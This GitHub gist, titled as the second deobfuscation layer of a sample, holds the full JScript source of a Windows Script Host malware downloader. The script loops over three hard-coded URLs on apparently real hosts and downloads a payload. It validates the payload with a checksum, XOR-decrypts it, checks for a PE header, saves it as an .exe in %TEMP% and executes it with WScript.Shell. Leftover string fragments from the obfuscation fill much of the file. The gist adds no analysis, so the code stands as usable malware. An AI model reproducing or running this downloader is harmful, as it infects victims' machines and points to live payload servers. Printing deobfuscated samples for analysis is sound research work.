Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Second deobfuscation layer result
var Wm = "close";
var BLLo = "File";
var JBl9 = "To";
var NAt9 = "Save";
var BGLm0 = "xt";
var WCz = "Te";
var Ae = "write";
var JREj7 = "open";
var EXb6 = "et";
var NRMWr1 = "Chars";
var RXKz = "pe";
var ZVTv = "ty";
var LFXh7 = "am";
var SRLb = "re";
var Xb8 = "DB.St";
var GAXp2 = "ADO";
var PHw = "ect";
var YWo8 = "bj";
var Nw1 = "eO";
var DTAf8 = "Creat";
function SVLPf3(DLc) {
return DLc;
};
var ZQq = "n";
var ASOBm = "joi";
function TWNJh9(LAe) {
return LAe;
};
function MQj3(ZZy) {
return ZZy;
};
var Ox3 = "e";
var Qd = "Cod";
var ZLOWx4 = "har";
var WHIo4 = "fromC";
var QAZy8 = "h";
var TNo = "lengt";
var QNv2 = "push";
function Iq5(BSYXd8) {
return BSYXd8;
};
function EGz9(YDw5) {
return YDw5;
};
var HHAa1 = "t";
var JPVRq = "deA";
var IZTe8 = "Co";
var LEHa4 = "char";
var FIUJq = "th";
var Sb7 = "leng";
var EOy5 = "se";
var GRQm8 = "clo";
function SVMGo(FOXt4) {
return FOXt4;
};
var YSDMn = "t";
var ECGz = "Tex";
var JLYa = "ad";
var Wc5 = "Re";
function WBv0(GVw6) {
return GVw6;
};
function VMv2(BEl9) {
return BEl9;
};
function WDPXn(NLFEq) {
return NLFEq;
};
var HVWNz5 = "le";
var CVFr4 = "romFi";
var Xj = "adF";
var Gf = "Lo";
var Mo = "open";
var RGs = "rset";
var VLXZi = "Cha";
var Rz = "type";
var NSy8 = "ream";
var NCBe5 = ".St";
var ZLEYb8 = "ADODB";
var MHj2 = "ct";
var RQUk5 = "Obje";
var Bs = "te";
var OHJNa1 = "Crea";
var Mc = "h";
var DWw = "lengt";
var LGBk = "gth";
var BRe = "len";
var Ec = "h";
var HUl = "ngt";
var ZTLf = "le";
var Gw = "lice";
var OOAj = "sp";
var Qt = "th";
var Af = "leng";
var Fd = "th";
var Nq5 = "leng";
var ZUJq = "th";
var LAm7 = "leng";
var HVBb = "h";
var YKr = "gt";
var DDc = "len";
var FOn6 = "p";
var Gw8 = "ee";
var EHp = "Sl";
function FPj(HSz5) {
return HSz5;
};
var Zb = "23";
var XODe = " 1";
var DWp4 = "n";
var PMBl0 = "Ru";
var Lt = "gth";
var WKw5 = "len";
var AIm = "gth";
var BGUr = "len";
var OMb = "close";
var DQZQs = "e";
var KKLq4 = "ToFil";
var INk = "Save";
var NCDj1 = "on";
var BMw4 = "ti";
var JWITa = "posi";
var Tt8 = "ody";
var ZMEa7 = "eB";
var Os = "ns";
var OPw = "Respo";
var GWMs = "te";
var MXw9 = "wri";
var URGa = "e";
var Zg8 = "typ";
var ZIr = "n";
var AXs5 = "ope";
function Cc(Nu) {
return Nu;
};
function LRJVy(FMIn) {
return FMIn;
};
var Rh0 = "am";
var YCs8 = "Stre";
var GCt5 = "DB.";
var BHj9 = "ADO";
var XSl8 = "ct";
var IRh = "Obje";
var WDd = "te";
var XSv8 = "Crea";
var SDd = "ep";
var HCs = "Sle";
var QYq = "nd";
var ACo1 = "se";
var DNy = "ngth";
var OKHc4 = "le";
var QOAJn = "T";
var KBc4 = "GE";
function BMz9(ESw) {
return ESw;
};
var Sg7 = "en";
var KBXl = "op";
var Sf = "eep";
var WLOBw4 = "Sl";
var Qg = "th";
var BWv8 = "leng";
var RJHAy = "ject";
var FLw = "teOb";
var BFLh9 = "Crea";
var Lp = "h";
var QBa3 = "gt";
var KFf1 = "len";
function Hu(XYAg5) {
return XYAg5;
};
var Ej = "HTTP";
var NMDf = "2.XML";
var AJGKb7 = "XML";
var DDNz = "MS";
var HUPn = "5.1";
var NBFv = "uest.";
var Po = "Req";
var MYKHp = "Http";
var MDLFt = "p.Win";
var RJg1 = "tt";
var ZId = "WinH";
var KDu = "xe";
var Gy1 = ".e";
function Er(QPt) {
return QPt;
};
var QJMHq = "P";
var EPDRu3 = "px";
var Dj = "MCTg";
var KCy1 = "dE";
function WUy(Cs) {
return Cs;
};
var ATw9 = "/";
var GYg1 = "EMP%";
var Ch = "%T";
var Bc7 = "hell";
var QKn7 = "ipt.S";
var Ls6 = "WScr";
function GWLu(TGl7) {
return TGl7;
};
var XEBy9 = "ect";
var Bg = "teObj";
var JMf6 = "Crea";
var ZMw = "g";
function YRz5(Sp1) {
return Sp1;
};
var Is = "0";
var AQt9 = "yvg";
var Rw2 = "/x";
var Do8 = "9";
var DIf = ".16";
var MNGq = "34";
var BGLFl = "1";
var SCc3 = "44.";
var Bm9 = ".2";
var Dg2 = "/80";
var GSGy4 = ":/";
var TSJq9 = "tp";
var GSc6 = "ht";
var VHGm = "n";
function Fl8(Ik4) {
return Ik4;
};
var ZHBLz4 = "up52";
function HWr(Dl5) {
return Dl5;
};
var QAKs7 = "et/ce";
function YEp0(DKr3) {
return DKr3;
};
var Gh7 = "lik.n";
var HOBMj = "an";
var Uc = "sm";
function MBIIv6(YMm) {
return YMm;
};
function DAj3(ACx) {
return ACx;
};
var DYXq = "i";
var EMDh = "an";
var TRw8 = "mad";
var BHXy3 = "te";
function RYBi(JLc7) {
return JLc7;
};
var RLn = "//";
var Dc2 = "p:";
var Le8 = "htt";
var WJd9 = "7vd";
var QJf9 = "x14";
var NOd = "m/";
function AZTo3(WMCd) {
return WMCd;
};
var YDa8 = "co";
var KIXn = "ts.";
var HACKc4 = "fla";
var SCj = "/u-";
var MWXi7 = "tp:/";
function VAd(QQf3) {
return QQf3;
};
var VQz = "ht";
var KHQn0 = "437";
var ZMq = "th";
var KUALl = "leng";
function XUYCo(Ka7) {
return Ka7;
};
var Xl = "s012";
var SDYe = "ys72b";
var Ag = "fd";
var OHAJe = "as";
var LEEXx = "asdf";
var Lb9 = "asf";
var FNl4 = "h";
var Jh3 = "ngt";
var DHTe0 = "le";
var YSv = "fGX1";
var AWIq = "DX";
var Rn = "ivWp";
var COt = "BJO";
var Nc4 = "vXSq";
var JKn = "avsd";
var EKz = "oF";
var KUWn3 = "XV5A6";
function IMNEr(GKu) {
return GKu;
};
function Dx8(ZBp0) {
return ZBp0;
};
function VXp2(CCLZh1) {
return CCLZh1;
};
function Al(WPx5) {
return WPx5;
};
function DKVLz(TCj) {
return TCj;
};
function HHILs(OEb) {
return OEb;
};
function JBTIc(NXp8) {
return NXp8;
};
var KIs = "h";
var KTp4 = "gt";
var HTOKb = "len";
function VTj(PQg) {
return PQg;
};
var JPo = "A";
var JYk9 = "AA";
var LBRHp = "AAAA";
var Hn = "AAAI";
var KRy = "AAA";
var RQo = "AAA";
var Qi = "2";
var CFo = "313";
var HCs0 = "112";
var MUj = "AAAAAAAAAIAAAAAAA";
var ORWd = 17;
var LNXWc7 = "XV5A6oFavsdvXSqBJOivWpDXfGX1";
var ZVo6 = 28;
var GQJk7 = "ys72bs012";
var Ca = 9;
var Ln = 1;
var NIGJh9 = 2;
var BYCq4 = 1 * 2;
var UNNx6 = "437";
var UIUr7 = ["http://u-flats.com/x147vd", "http://temadanismanlik.net/ceup52n", "http://80.244.134.169/xyvg0g"];
var EOMy = WScript.CreateObject("WScript.Shell");
var Ba2 = EOMy.ExpandEnvironmentStrings("%TEMP%/");
var VAu = Ba2 + "dEMCTgpxP";
var BVh9 = VAu + ".exe";
var Ut6 = ["WinHttp.WinHttpRequest.5.1", "MSXML2.XMLHTTP"];
for (var TGTSe = 6315 - 6315; TGTSe < Ut6.length; TGTSe++) {
try {
var VFHu = WScript.CreateObject(Ut6[TGTSe]);
break;
} catch (e) {
continue;
}
};
var NIYr = 1;
var DJHUe9 = 0;
do {
try {
if (1 == NIYr) {
if (DJHUe9 >= UIUr7.length) {
DJHUe9 = 0;
WScript.Sleep(1000);
}
VFHu.open("GET", UIUr7[DJHUe9++ % UIUr7.length], false);
VFHu.send();
}
if (VFHu.readystate < 4) {
WScript.Sleep(100);
continue;
}
var AXCk = WScript.CreateObject("ADODB.Stream");
AXCk.open();
AXCk.type = Ln /* s */ ;
AXCk.write(VFHu.ResponseBody);
AXCk.position = 0;
AXCk.SaveToFile(VAu, BYCq4);
AXCk.close();
var Bp = JFSHm(VAu);
Bp = NWAq5(Bp);
if (Bp.length < (2130 - 1980) * 1024 || Bp.length > (81 * 2 + 13) * 1024 || !TQWGb6 /* s */ (Bp)) {
NIYr = 1;
continue;
}
try {
ECz7(BVh9, Bp);
} catch (e) {
break;
};
EOMy.Run(BVh9 + " 1" + "23");
break;
} catch (e) {
WScript.Sleep(167 * 5 + 165);
continue;
};
} while (NIYr);
WScript.Quit(0);
function NWAq5(TRp5) {
var PSXCa;
var LZMm8 = TRp5[TRp5.length - 4] | TRp5[TRp5.length - 3] << (-9770 + 9778) | TRp5[TRp5.length - 2] << 16 | TRp5[TRp5.length - 1] << 24;
TRp5.splice(Bp.length - 4, 4);
PSXCa = ORWd;
for (var TGTSe = 0; TGTSe < TRp5.length; TGTSe++) {
PSXCa = (PSXCa + TRp5[TGTSe]) % 0x100000000;
};
if (PSXCa != LZMm8) {
return []
};
RQh = ZVo6 /* s */ ;
TRp5 = TRp5.reverse();
for (var TGTSe = 0; TGTSe < TRp5.length; TGTSe++) {
TRp5[TGTSe] ^= RQh;
RQh = (RQh + Ca) % 256;
};
return TRp5;
};
function TQWGb6 /* s */ (TRp5) {
if (TRp5[0] == 0x4D && TRp5[1 * 1] == 0x5a) {
return true;
} else {
return false;
}
};
function JFSHm(HKAj2 /* s */ ) {
var Ss3 = WScript.CreateObject("ADODB.Stream");
Ss3.type = NIGJh9;
Ss3.Charset = UNNx6;
Ss3.open();
Ss3.LoadFromFile(HKAj2 /* s */ );
var WYAr3 = Ss3.ReadText;
Ss3.close();
return Sl1(WYAr3);
};
function Sl1(ZCLd) {
var ZUe = new Array();
ZUe[0xC7] = 0x80;
ZUe[0xFC] = 0x81;
ZUe[0xE9] = 0x82;
ZUe[0xE2] = 0x83;
ZUe[0xE4] = 0x84;
ZUe[0xE0] = 0x85;
ZUe[0xE5] = 0x86;
ZUe[0xE7] = 0x87;
ZUe[0xEA] = 0x88;
ZUe[0xEB] = 0x89;
ZUe[0xE8] = 0x8A;
ZUe[0xEF] = 0x8B;
ZUe[0xEE] = 0x8C;
ZUe[0xEC] = 0x8D;
ZUe[0xC4] = 0x8E;
ZUe[0xC5] = 0x8F;
ZUe[0xC9] = 0x90;
ZUe[0xE6] = 0x91;
ZUe[0xC6] = 0x92;
ZUe[0xF4] = 0x93;
ZUe[0xF6] = 0x94;
ZUe[0xF2] = 0x95;
ZUe[0xFB] = 0x96;
ZUe[0xF9] = 0x97;
ZUe[0xFF] = 0x98;
ZUe[0xD6] = 0x99;
ZUe[0xDC] = 0x9A;
ZUe[0xA2] = 0x9B;
ZUe[0xA3] = 0x9C;
ZUe[0xA5] = 0x9D;
ZUe[0x20A7] = 0x9E;
ZUe[0x192] = 0x9F;
ZUe[0xE1] = 0xA0;
ZUe[0xED] = 0xA1;
ZUe[0xF3] = 0xA2;
ZUe[0xFA] = 0xA3;
ZUe[0xF1] = 0xA4;
ZUe[0xD1] = 0xA5;
ZUe[0xAA] = 0xA6;
ZUe[0xBA] = 0xA7;
ZUe[0xBF] = 0xA8;
ZUe[0x2310] = 0xA9;
ZUe[0xAC] = 0xAA;
ZUe[0xBD] = 0xAB;
ZUe[0xBC] = 0xAC;
ZUe[0xA1] = 0xAD;
ZUe[0xAB] = 0xAE;
ZUe[0xBB] = 0xAF;
ZUe[0x2591] = 0xB0;
ZUe[0x2592] = 0xB1;
ZUe[0x2593] = 0xB2;
ZUe[0x2502] = 0xB3;
ZUe[0x2524] = 0xB4;
ZUe[0x2561] = 0xB5;
ZUe[0x2562] = 0xB6;
ZUe[0x2556] = 0xB7;
ZUe[0x2555] = 0xB8;
ZUe[0x2563] = 0xB9;
ZUe[0x2551] = 0xBA;
ZUe[0x2557] = 0xBB;
ZUe[0x255D] = 0xBC;
ZUe[0x255C] = 0xBD;
ZUe[0x255B] = 0xBE;
ZUe[0x2510] = 0xBF;
ZUe[0x2514] = 0xC0;
ZUe[0x2534] = 0xC1;
ZUe[0x252C] = 0xC2;
ZUe[0x251C] = 0xC3;
ZUe[0x2500] = 0xC4;
ZUe[0x253C] = 0xC5;
ZUe[0x255E] = 0xC6;
ZUe[0x255F] = 0xC7;
ZUe[0x255A] = 0xC8;
ZUe[0x2554] = 0xC9;
ZUe[0x2569] = 0xCA;
ZUe[0x2566] = 0xCB;
ZUe[0x2560] = 0xCC;
ZUe[0x2550] = 0xCD;
ZUe[0x256C] = 0xCE;
ZUe[0x2567] = 0xCF;
ZUe[0x2568] = 0xD0;
ZUe[0x2564] = 0xD1;
ZUe[0x2565] = 0xD2;
ZUe[0x2559] = 0xD3;
ZUe[0x2558] = 0xD4;
ZUe[0x2552] = 0xD5;
ZUe[0x2553] = 0xD6;
ZUe[0x256B] = 0xD7;
ZUe[0x256A] = 0xD8;
ZUe[0x2518] = 0xD9;
ZUe[0x250C] = 0xDA;
ZUe[0x2588] = 0xDB;
ZUe[0x2584] = 0xDC;
ZUe[0x258C] = 0xDD;
ZUe[0x2590] = 0xDE;
ZUe[0x2580] = 0xDF;
ZUe[0x3B1] = 0xE0;
ZUe[0xDF] = 0xE1;
ZUe[0x393] = 0xE2;
ZUe[0x3C0] = 0xE3;
ZUe[0x3A3] = 0xE4;
ZUe[0x3C3] = 0xE5;
ZUe[0xB5] = 0xE6;
ZUe[0x3C4] = 0xE7;
ZUe[0x3A6] = 0xE8;
ZUe[0x398] = 0xE9;
ZUe[0x3A9] = 0xEA;
ZUe[0x3B4] = 0xEB;
ZUe[0x221E] = 0xEC;
ZUe[0x3C6] = 0xED;
ZUe[0x3B5] = 0xEE;
ZUe[0x2229] = 0xEF;
ZUe[0x2261] = 0xF0;
ZUe[0xB1] = 0xF1;
ZUe[0x2265] = 0xF2;
ZUe[0x2264] = 0xF3;
ZUe[0x2320] = 0xF4;
ZUe[0x2321] = 0xF5;
ZUe[0xF7] = 0xF6;
ZUe[0x2248] = 0xF7;
ZUe[0xB0] = 0xF8;
ZUe[0x2219] = 0xF9;
ZUe[0xB7] = 0xFA;
ZUe[0x221A] = 0xFB;
ZUe[0x207F] = 0xFC;
ZUe[0xB2] = 0xFD;
ZUe[0x25A0] = 0xFE;
ZUe[0xA0] = 0xFF;
var Bp = new Array();
for (var TGTSe = 1 * 0; TGTSe < ZCLd.length; TGTSe++) {
var ULQm4 = ZCLd.charCodeAt(TGTSe);
if (ULQm4 < 128) {
var HTBb7 = ULQm4;
} else {
var HTBb7 = ZUe[ULQm4];
}
Bp.push(HTBb7);
};
return Bp;
};
function KGa /* s */ (TRp5) {
var WNKh = new Array();
WNKh[0x80] = 0x00C7;
WNKh[0x81] = 0x00FC;
WNKh[0x82] = 0x00E9;
WNKh[0x83] = 0x00E2;
WNKh[0x84] = 0x00E4;
WNKh[0x85] = 0x00E0;
WNKh[0x86] = 0x00E5;
WNKh[0x87] = 0x00E7;
WNKh[0x88] = 0x00EA;
WNKh[0x89] = 0x00EB;
WNKh[0x8A] = 0x00E8;
WNKh[0x8B] = 0x00EF;
WNKh[0x8C] = 0x00EE;
WNKh[0x8D] = 0x00EC;
WNKh[0x8E] = 0x00C4;
WNKh[0x8F] = 0x00C5;
WNKh[0x90] = 0x00C9;
WNKh[0x91] = 0x00E6;
WNKh[0x92] = 0x00C6;
WNKh[0x93] = 0x00F4;
WNKh[0x94] = 0x00F6;
WNKh[0x95] = 0x00F2;
WNKh[0x96] = 0x00FB;
WNKh[0x97] = 0x00F9;
WNKh[0x98] = 0x00FF;
WNKh[0x99] = 0x00D6;
WNKh[0x9A] = 0x00DC;
WNKh[0x9B] = 0x00A2;
WNKh[0x9C] = 0x00A3;
WNKh[0x9D] = 0x00A5;
WNKh[0x9E] = 0x20A7;
WNKh[0x9F] = 0x0192;
WNKh[0xA0] = 0x00E1;
WNKh[0xA1] = 0x00ED;
WNKh[0xA2] = 0x00F3;
WNKh[0xA3] = 0x00FA;
WNKh[0xA4] = 0x00F1;
WNKh[0xA5] = 0x00D1;
WNKh[0xA6] = 0x00AA;
WNKh[0xA7] = 0x00BA;
WNKh[0xA8] = 0x00BF;
WNKh[0xA9] = 0x2310;
WNKh[0xAA] = 0x00AC;
WNKh[0xAB] = 0x00BD;
WNKh[0xAC] = 0x00BC;
WNKh[0xAD] = 0x00A1;
WNKh[0xAE] = 0x00AB;
WNKh[0xAF] = 0x00BB;
WNKh[0xB0] = 0x2591;
WNKh[0xB1] = 0x2592;
WNKh[0xB2] = 0x2593;
WNKh[0xB3] = 0x2502;
WNKh[0xB4] = 0x2524;
WNKh[0xB5] = 0x2561;
WNKh[0xB6] = 0x2562;
WNKh[0xB7] = 0x2556;
WNKh[0xB8] = 0x2555;
WNKh[0xB9] = 0x2563;
WNKh[0xBA] = 0x2551;
WNKh[0xBB] = 0x2557;
WNKh[0xBC] = 0x255D;
WNKh[0xBD] = 0x255C;
WNKh[0xBE] = 0x255B;
WNKh[0xBF] = 0x2510;
WNKh[0xC0] = 0x2514;
WNKh[0xC1] = 0x2534;
WNKh[0xC2] = 0x252C;
WNKh[0xC3] = 0x251C;
WNKh[0xC4] = 0x2500;
WNKh[0xC5] = 0x253C;
WNKh[0xC6] = 0x255E;
WNKh[0xC7] = 0x255F;
WNKh[0xC8] = 0x255A;
WNKh[0xC9] = 0x2554;
WNKh[0xCA] = 0x2569;
WNKh[0xCB] = 0x2566;
WNKh[0xCC] = 0x2560;
WNKh[0xCD] = 0x2550;
WNKh[0xCE] = 0x256C;
WNKh[0xCF] = 0x2567;
WNKh[0xD0] = 0x2568;
WNKh[0xD1] = 0x2564;
WNKh[0xD2] = 0x2565;
WNKh[0xD3] = 0x2559;
WNKh[0xD4] = 0x2558;
WNKh[0xD5] = 0x2552;
WNKh[0xD6] = 0x2553;
WNKh[0xD7] = 0x256B;
WNKh[0xD8] = 0x256A;
WNKh[0xD9] = 0x2518;
WNKh[0xDA] = 0x250C;
WNKh[0xDB] = 0x2588;
WNKh[0xDC] = 0x2584;
WNKh[0xDD] = 0x258C;
WNKh[0xDE] = 0x2590;
WNKh[0xDF] = 0x2580;
WNKh[0xE0] = 0x03B1;
WNKh[0xE1] = 0x00DF;
WNKh[0xE2] = 0x0393;
WNKh[0xE3] = 0x03C0;
WNKh[0xE4] = 0x03A3;
WNKh[0xE5] = 0x03C3;
WNKh[0xE6] = 0x00B5;
WNKh[0xE7] = 0x03C4;
WNKh[0xE8] = 0x03A6;
WNKh[0xE9] = 0x0398;
WNKh[0xEA] = 0x03A9;
WNKh[0xEB] = 0x03B4;
WNKh[0xEC] = 0x221E;
WNKh[0xED] = 0x03C6;
WNKh[0xEE] = 0x03B5;
WNKh[0xEF] = 0x2229;
WNKh[0xF0] = 0x2261;
WNKh[0xF1] = 0x00B1;
WNKh[0xF2] = 0x2265;
WNKh[0xF3] = 0x2264;
WNKh[0xF4] = 0x2320;
WNKh[0xF5] = 0x2321;
WNKh[0xF6] = 0x00F7;
WNKh[0xF7] = 0x2248;
WNKh[0xF8] = 0x00B0;
WNKh[0xF9] = 0x2219;
WNKh[0xFA] = 0x00B7;
WNKh[0xFB] = 0x221A;
WNKh[0xFC] = 0x207F;
WNKh[0xFD] = 0x00B2;
WNKh[0xFE] = 0x25A0;
WNKh[0xFF] = 0x00A0;
var RLWv = new Array();
var Qq1 = "";
var HTBb7;
var ULQm4;
for (var TGTSe = 0; TGTSe < TRp5.length; TGTSe++) {
HTBb7 = TRp5[TGTSe];
if (HTBb7 < 128) {
ULQm4 = HTBb7;
} else {
ULQm4 = WNKh[HTBb7];
}
RLWv.push(String.fromCharCode(ULQm4));
}
Qq1 = RLWv.join("");
return Qq1;
};
function ECz7(HKAj2 /* s */ , TRp5) {
var Ss3 = WScript.CreateObject("ADODB.Stream");
Ss3.type = NIGJh9;
Ss3.Charset = UNNx6;
Ss3.open();
Ss3.writeText(KGa /* s */ (TRp5));
Ss3.SaveToFile(HKAj2 /* s */ , 2);
Ss3.close();
};
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.